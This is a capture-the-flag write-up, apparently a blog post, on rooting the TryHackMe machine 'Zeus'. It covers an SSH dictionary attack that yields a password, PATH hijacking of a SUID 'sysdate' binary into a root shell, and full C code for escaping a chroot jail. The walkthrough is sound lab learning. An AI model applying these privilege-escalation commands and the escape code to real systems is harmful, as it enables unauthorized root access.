Deploy this VM and follow along with me!

There is no need to download the virtual machine and configure it, as you can simply deploy it in the cloud using TryHackMe here

Nmap

Lets start with an nmap scan:

nmap-1

Okay no unusual port open. Let's start with the FTP since it allows anonymous login.

FTP

Perhaps something will appear over FTP
ftp
I got nothing on the FTP server because I was not able to list the directory. I tried to use it in passive mode but still nothing. So I just left it as is and moved on to HTTP enumeration.

HTTP

website-1
From our nmap scan, we know port 80 is open. If we visit port 80 we can see a login form. I tried to some basic SQLi like 1=1' or admin' -- on it but it seemed that it was not vulnerable to SQLi. So I ran dirsearch on the website to see if I could find anything interesting.

dirsearch
I tried visiting the /backups but got nothing and visiting the /telecom directory gave me a blank page. However, there was a comment in the source of that page!

source
It says the website will be updated by gogu. This comment tells us that there's a user named gogu.

From here I spent some time trying to find something else that would be of use, but couldn't and so I started a dictionary attack on the SSH service. I managed to get the password for gogu with my dictionary attack.

hydra

gogu: universal

Note: I tried to run dictionary attack on FTP but the connection kept dropping. Also it took me 1h 5m to get the correct password using rockyou wordlist.

Since we have the credentials we can just login and get our user flag.

user

Privilege escalation

The interesting thing was that this machine had nothing installed and by nothing I mean only few binaries so there wasn't anything like python or netcat.

jail

I thought it was going to be some kind of jail escape to priv esc, but I didn't found anything related to this on Google so I just dropped the idea of this whole JAIL ESCAPE idea and continued looking for something else.

In the gogu home directory there's a binary named hackme I tried running it but it did nothing i.e When I tried to execute it it gave no output.

Interestingly there was a folder in /home/gogu which was named ....

folder
In that folder there was a file name sysdate which had root permission meaning it's a SUID 😏😏

sysdate
The binary tells the system date and time.

output
Now we need to anaylze that binary, so we can exploit it and get root access.

We can't get this binary to our local system for number of reasons:

  1. No wget/python to do so (you can do it with SSH but 2nd point)
  2. The moment we get it on our system and put it back it looses privileges so no use.

So to see what's the binary doing to give us the output I ran cat on that binary

cat
It run's the date command and grep for EEST. Okay this is easy to exploit as we can just make a file name date with a shell in it and then run the sysdate and it will give us shell.

WHY?

Because in that binary it's using date and not /bin/date i.e no absolute path is mentioned.

Run the following commands:

  • echo "/bin/sh -i" >> date
  • chmod +x date
  • export PATH=.:$PATH

and then run the ./sysdate and BOOM!! 💥💥

root-shell
We got a root shell and now we just need get the root flag.

no-root
Even though we have the root shell we are still stuck with that jail shell(I knew it was a jail) and that is why we can't see root. DAMN!!!! 😡😡😡

Onto escaping the jail...

Jail escape

Now since I am sure we need to find a way to escape this jail I just decided to look specifically for jails. After some further research and banging my head agaist the wall, I finally figured out how to escape this.

The jail we were in is a chroot jail. I found an article about escaping chroot jail. That blog post has C code which we can use to escape the jail.

#include <sys/stat.h>
#include <unistd.h>
#include <fcntl.h>

int main() {
    int dir_fd, x;
    setuid(0);
    mkdir(".42", 0755);
    dir_fd = open(".", O_RDONLY);
    chroot(".42");
    fchdir(dir_fd);
    close(dir_fd);
    for(x = 0; x < 1000; x++) chdir("..");
    chroot(".");
    return execl("/bin/sh", "-i", NULL);
}

Put that code in a file name escape.c and then compile the binary using the following writeup:

➜ gcc escape.c -o escape -m32

Command explanation

  • escape.c - Name of the file having the exploit code.
  • -o escape - gcc will make a binary with name escape.
  • -m32 - It will make a 32 bit binary.

Now we can send this file to the machine via SSH. Best method is to use cat command in a following way:

➜ ssh gogu@192.168.131.170 "cat> escape" < escape

This command sends the content of the escape file through SSH to another file on the machine named escape. After running this you would be able to see a binay named escape in the gogu home directory.

send
Now we need to run that binary as root through sysdate. Run the following commands:

  • echo "/home/gogu/escape">date;
  • chmod +x date;
  • export PATH=/home/gogu:$PATH

Note: Don't forget to change the permission of escape file i.e run chmod +x escape, after getting it on the machine. I forgot to do it 😜😜😜

Now just run the sysdate and you'll be able to get the root.

root

Final Consideration

Zeus is a pretty good machine that teaches you about how file permissions can have a huge impact on your system. It also educates you on how jails work. All in all this was an awesome machine.

Personally, I really liked the whole jail escape concept. I had not done any machine in which I was root but couldn't read the root flag.

Thanks to @SirPwnALot for making such a great machine (which is hosted on TryHackMe) I hope this article has contributed a something to your knowledge and learning.

I've written writeups on quite a few Vulnhub boxes make sure you check them out on my blog.

Follow me @0xmzfr for more Writeups.

Credits to Muhammed Sajid on Dribble for the artwork.

Thanks for reading, Feedback is always appreciated.